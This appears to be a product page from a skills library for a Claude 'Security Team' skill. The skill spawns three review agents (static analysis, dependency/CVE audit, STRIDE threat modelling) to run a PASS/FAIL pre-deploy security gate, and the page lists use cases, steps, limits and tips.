← Skills Library
Agent Teams

Security Team

Spawn a 3-agent security review team (Static Analyzer + Dependency Auditor + Threat Modeler) for pre-deploy security gates.

How It Works

Security Team · Workflow
Three security lanes in parallel, then a PASS/FAIL deploy gate.
TriggerSecurity review / pre-deploy · Threat model, dependency audit, or pre-deploy gate
1
Scope the surface
Changed files · critical paths · stack & packages
2Spawn 3 agentsPARALLEL
Static Analyzer
OWASP Top 10 · secrets · injection — fixes P0
Dependency Auditor
npm/pip audit · CVEs · upgrade paths
Threat Modeler
Attack surface · STRIDE · trust boundaries
Faster than a full audit swarm
3
Triage and act
Merge by severity · resolve P0s · open CVE upgrade PRs
4
Security gateGATE
P0s resolved · 0 Critical CVEs · threat model committed
failFAIL — surface unresolved risk to Knox
Review + threat-model.md · Findings by severity · mitigations · docs/security/threat-model.md
  1. Security review / pre-deploy: Threat model, dependency audit, or pre-deploy gate
  2. Scope the surface: Changed files · critical paths · stack & packages
  3. Spawn 3 agents
  4. Triage and act: Merge by severity · resolve P0s · open CVE upgrade PRs
  5. Security gate: P0s resolved · 0 Critical CVEs · threat model committed
  6. Review + threat-model.md: Findings by severity · mitigations · docs/security/threat-model.md
ↆ download card

Invocation Triggers

/security-teamsecurity reviewthreat modeldependency auditpre-deploy security

Use Cases

  • Pre-deploy security gate before launching a new service
  • Dependency audit for a third-party package adoption
  • Threat model a new authentication or payment flow

The Problem

Solo security reviews scan for the thing you happened to remember to look for. You grep for secrets, glance at npm audit, and call it clean — while the IDOR in the auth flow and the abandoned dependency fetching remote code at install time both sail through. A pre-deploy gate that only catches what one tired engineer thought of at 6pm is not a gate. It is a feeling.

What It Does

  1. 1
    Define the scope

    Identify the changed surface (git diff main...HEAD), the critical paths (auth, payments, data access, external calls), and the stack. Scope is agreed explicitly, not assumed — changed files can still call unchanged vulnerable code.

  2. 2
    Spawn all 3 agents in parallel

    Static Analyzer (sonnet) hunts OWASP Top 10, secrets, and unsanitized sinks. Dependency Auditor (sonnet) runs npm/pip/cargo audit and assesses real exploitability. Threat Modeler (opus) maps the attack surface and runs STRIDE on the critical flows.

  3. 3
    Static analysis with P0 self-fix

    The Static Analyzer scans for injection, broken auth, XSS, IDOR, hardcoded keys, dangerouslySetInnerHTML without sanitization, and string-built SQL. Actively exploitable P0s get fixed inline; P1/P2 are documented with file:line and remediation.

  4. 4
    Dependency and CVE audit

    Critical and High CVEs get researched for actual exploitability in this codebase — not just a raw audit dump. Abandoned packages and remote-fetching installers are flagged separately, because they never show up in npm audit output.

  5. 5
    Threat model and persist

    The Threat Modeler maps entry points and trust boundaries, ranks the highest-risk paths, and writes the model to docs/security/threat-model.md. An in-context report that never gets committed is lost on the next session.

  6. 6
    Triage and gate

    Findings merge by severity. P0s resolve immediately, Critical/High CVEs get upgrade PRs, and the gate prints PASS or FAIL with explicit counts. Identified risks with no mitigation are never a PASS.

What You Get / What It Doesn't Do

What you get
  • Severity-merged findings table with file:line and remediation per item
  • P0 vulnerabilities fixed inline, each with a regression test
  • CVE upgrade PRs for Critical and High dependencies
  • A committed docs/security/threat-model.md with the ranked attack surface
  • A PASS/FAIL gate line with explicit P0, P1, and CVE counts
What it doesn't do
  • Accept an identified risk without your explicit sign-off
  • Replace a full audit swarm — this is security-only, by design
  • Auto-merge dependency upgrade PRs — you review the version bumps
  • Guarantee zero vulnerabilities — it covers known patterns and CVEs, not unknowns

Tips

Verify the self-fixed P0s

An agent fixing its own work is not an independent check. Run the test suite after any Static Analyzer P0 fix and confirm a regression test exists.

npm audit is not the whole audit

A clean audit only means no known CVEs. The abandoned package and the install-time remote fetch never appear there — that is exactly what the Dependency Auditor exists to catch.

A model with no mitigations is not a PASS

The Threat Modeler listing risks is half the job. Either implement the mitigation or formally accept the risk with sign-off before you call the gate green.

Get the Skill

Elite SkillELITE

Unlock the full Security Team SKILL.md — drop it into ~/.claude/skills/ and trigger it by name.

What you unlock
  • Severity-merged findings table with file:line and remediation per item
  • P0 vulnerabilities fixed inline, each with a regression test
  • CVE upgrade PRs for Critical and High dependencies
  • A committed docs/security/threat-model.md with the ranked attack surface
...

Commonly Used With

Build & DeployVerifyPre-PR gate: runs your full build → lint → test → secrets scan loop and produces a PASS / CLOSE / FAIL verdict with a prioritized fix list. Single agent. No auto-fix.Agent TeamsFeature TeamSpawn a 3-agent team (Backend Dev + Frontend Dev + QA) to implement features from PRDs. Agents own separate file territories and coordinate via messaging.
Skills Library

29 more production skills ready to install.

Browse All Skills